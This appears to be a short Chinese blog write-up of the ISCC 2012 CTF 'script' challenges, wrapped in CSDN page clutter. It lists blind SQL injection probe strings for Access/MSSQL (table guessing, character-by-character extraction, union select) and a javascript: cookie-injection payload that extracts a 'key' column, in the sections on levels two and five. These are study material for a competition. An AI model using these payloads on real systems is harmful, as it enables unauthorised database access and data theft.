ISCC2012 脚本关的一些蛋疼想法

最新推荐文章于 2024-06-18 15:39:34 发布
最新推荐文章于 2024-06-18 15:39:34 发布
阅读量1.7k 收藏 1
点赞数
分类专栏: CTF 渗透笔记 文章标签: 脚本 javascript 数据库 解密 sql access
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wangyi_lin/article/details/7563870
版权
虽然叫做脚本关,但是和脚本关系不大(个人觉得)。

脚本第一关: 用linux指令把文件内容读出来就行了,我用的cat.

脚本第二关:告送了你数据库中的表名和字段名,简单的注入,比较懒的人可以用 啊D 跑出来,手工的话union这种方法貌似不能用。把常用的SQL语句粘贴一下

select * from 表 where id='ade7' and '1'='1'
and exists (select count(*) from sysobjects)     /*MYSQL*/
 and exists (select count(*) from msysobjects)   /*ACCESS*/
and exists (select count(*) from 要猜的表名)
and (select count(要猜的列名) from 猜到的表名)>0
and (select count(*) from 猜到的表名)>X
and (select top 1 len(列) from 表)>X 
and (select top 1 asc(mid(列,X,1)) from 表)>N
union select 1,2,3,4,5,6,7,8,9,10 from admin
脚本第三关:这个比较水,改一下一个隐藏表单的值,提交以下就可以了。

脚本第四关:这个也很水,把数据库下下来,找个解密软件把密码跑出来,好像是LW什么的,就行了。好像mdb的密码比较水,拿文件中的几位随便or几下xor几下,就能把密码闹出来。

脚本第五关:这个比较难,需要cookie注入,查询字符串构造的也比较变态,不好做中转,重点是SQL语句中关键字做表名要用大括号括起来比如[key],幸好这个注入点可以用union来爆SQL语句是这样的。

javascript:alert(document.cookie="title="+escape("1' union all select 1,key,3 from [key] where id=1 and key like '%"));

脚本第六关:很水的题,javascript加密了好像是一种叫做,JSencode的方法,解密一下就可以了。

wangyi_lin
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
ISCC 2012 内核的一些蛋疼想法
王意林的专栏
06-12 2514
内核是最蛋疼的一,需要配置DDK VM 之类的一些东西,调试过程中还很有可能各种蓝屏,而且我的机器也不给力,巨卡无比,所以调试过程中·也是各种阻碍各种死机。 内核一: 题目给一个内核文件,要求调用此内核文件一个函数来读出密码的长度,其实用笔记本打开后可以看到密码,发现代码很短,挨个试一下,水水的解决了。 内核二: 这题我纠结了很久,题目要求实现一个windows API H
ISCC 2012 真实第二题
王意林的专栏
07-11 1286
先抱怨一下,比赛网站移植的系统有很多功能不能正常使用,推荐使用原网站http://bitaec.com/进行测试。 第二是对一个建材网站的渗透测试,习惯性的拿出wwwscan一顿狂扫,只发现一个有价值的目录。http://bitaec.com/robots.txt 这是对网络爬虫的一些规则设置,爬虫会首先检查,网页根目录下有没有robots.txt, 可以置一些你不想让搜索引擎收录的页面,
ISCC2012 基础的一些蛋疼想法
王意林的专栏
05-11 3097
近几天还乡,既没有衣锦也没有热泪,家乡的菜还是一如既往的好吃,工大的食堂比不上,学校院子外面有点正宗的水煮鱼也比不上,家外边的胡同里的麻辣串涨到了7毛钱一根,隔壁兰州拉面里的汽水也买到了1块5,我跟老板娘调侃”我上一次吃不还是6毛钱吗“,大妈呵呵的笑着”那是多长时间以前了吧“,仔细回想好像还真是有一段时间了,家边的麻辣串摊,一般都是下午3.4点出现,持续到晚上1.2点,夏天的夜里会有一些爷们光着膀
ISCC2012 溢出的一些蛋疼想法
王意林的专栏
05-20 1542
溢出只有两道题,好像最近溢出的漏洞比较少了,也没有什么经典例子可以举吧。 溢出第一:试一试或者手动推算一下,这个比较简单。 溢出第二:题目要求写一个添加用户的shellcode,理论来说不算很难但是比较麻烦,也有点蛋疼。 第一步是查找LoadLibrary和system两个函数在内存中的地址 typedef void (*MYPROC)(LPTSTR); LoadLibar
ISCC2012 破解的一些蛋疼想法
王意林的专栏
05-16 1823
破解不算非常的难,不过第三题还是困扰了我很长时间的 第一题: 使用ULtra String Reference 轻松搞定 第二题: 使用ULtra String Reference 轻松搞定 第三题: 加了个比较变态的壳,使用PEid查了一下叫做,PE-Armor V0.460-V0.759 -> hying *,在看雪上下了几个脱壳机都没搞定,尝试了一下手工脱壳因为水平有限,壳也比较变
ISCC 2012 真实第一题
王意林的专栏
07-04 3216
第一天: 整个网站,没有什么思路,无从下手的感觉,拿wwwscan一顿狂扫,发现很多目录都是403,可能是做了IP限制,扫到一个叫做htaccess, http://www.isclab.org/contest/.htaccess下下来发现是一些转跳的 规则,和一些防下载防列目录的规则,从中找到了服务器的架构   Apache/PHP/Drupal  百度了一下,也没有什么可利用的漏洞。
ISCC 2012 破解第四题 我已经不蛋疼啦~
王意林的专栏
06-25 2874
前一阵突然出现推出了这个破解第四题,看了看没啥思路,题意大概就是让你反编译一个小程序,然后具体分析达到功能的方法,最后再仿写一个。 分析程序这一步不多说了,大概就是查端口,抓包,做些特殊数据的测试。端口我用的是冰刃,或者命令行netstat自己找也行,抓包我用的WSExporer可以进程抓包,比较方便 ,可以在我的资源里下载。 通过端口和抓包大致可以知道,软件运行的过程是这样的。 现在2
2024年ISCC练武题部分WriteUp
Aluxian_的博客
05-27 1746
2024年ISCC练武题部分WriteUp
ISCC2024 WriteUp
最新发布
m0_73948163的博客
06-18 1040
将这个文件复制到桌面发现还需要密码根据题目描述2024年10月14日早8点,小明敲键盘时候解出了flag,感觉是计算时间差的于是写一个计算时间差的脚本参考。最后运行得出flag ISCC{XbGazFZZFwdJEPiqoW}时间刺客 writeup解题思路。
ISCC2022题目附件
06-06
2022ISCC所有题目附件,包含ISCC2022-练武题附件和ISCC2022-擂台题附件 信息安全已涉及到国家政治、经济、文化、社会和生态文明的建设,信息系统越发展到它的高级阶段,人们对其依赖性就越强,从某种程度上讲其越...
ISCC2021-MISC部分题目.zip
08-07
ISCC2021-MISC部分题目.zip是一个与ISCC(International Symposium on Computer Science and Convergence,国际计算机科学与融合大会)相的压缩包文件。这个压缩包可能包含了该会议的多份论文、研究报告或者竞赛...
ISCC2012内核5题解
06-15
### ISCC2012内核5题解详解 #### 题目背景与解析方法概述 本题涉及Windows内核编程中一个重要的组件——**工作队列(Work Queue)**。工作队列机制用于异步执行一些轻量级的任务,例如定时任务或者设备I/O完成处理...
ISCC2021线上赛赛题.zip
05-19
ISCC2021线上赛赛题.zip wp见主页
ISCC题库.docx
05-23
ISCC2020比赛题库 ISCC ISCC ISCC ISCC
Steganography
热门推荐
王意林的专栏
09-02 1万+
Steganography就是隐写术的意思,整理一下相题目。 Windows~ 这个题是一段视频,里面借了些乱七八糟的声音,视频上一直在显示一些不断闪动的小窗户。
Reconnaissance
王意林的专栏
09-27 6388
这种就是人肉一个人,比较蛋疼,不是,是非常蛋疼。 Alexander Taylor( CSAW CTF Qualification Round 2013 ) 这个逼把key藏在了官网judges介绍的图片里,非常阴险,就是这货 打开这个图片那python脚本看一下图片的信息,其中有3个tExt的段有tips 大概意思就是让我们找到存储信息的chunk tEXt:
在大连做安天技术论坛 GuessMe2
王意林的专栏
07-29 5842
个人觉得这个GuessMe2是很坑爹的,完全纯猜,十分蛋疼。 根据楼主的出题思路第一层可以暴力跑出来,密码为ren。解压后出现这个东西 发帖日期是正月初七,于是联想到正月初七是人日,不过于这个习俗是有两个不同的版本的。 一鸡二鸭,猫三狗四,猪五羊六,人七马八,九果十菜 岁正月一日占鸡,二日占狗,三日占猪,四日占羊,五日占牛,六日占马,七日占人,八日占谷。 再根据压
在大连做安天技术论坛 GuessMe4
王意林的专栏
08-06 5610
一开始依旧是一个压缩包,提示密码为一个文件后缀,尝试rar,竟然对了 解压之后是一个com.exe,这是一个使用copy指令,合并的四个文件。copy指令的合并方法这样使用 copy 1.txt/a + 2.jpg/b 3.jpg /a是以assic码合并,/b是以二进制合并,合并后第二个文件的编码追加在第一个文件后面, 如果都用二进制方式合并,只要修改文件后缀就可以,打开
2019 ISCC CTF挑战:代码审计解密PHP脚本
在2019年信息安全挑战大会(ISCC)的CTF安全比赛中,有一道相对简单的题目,题目名为"2019ISCC writeup"。这道题目属于代码审计类别,主要考察参赛者对PHP函数的理解和利用,特别是涉及到的缺陷或特性分析。挑战者需要...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值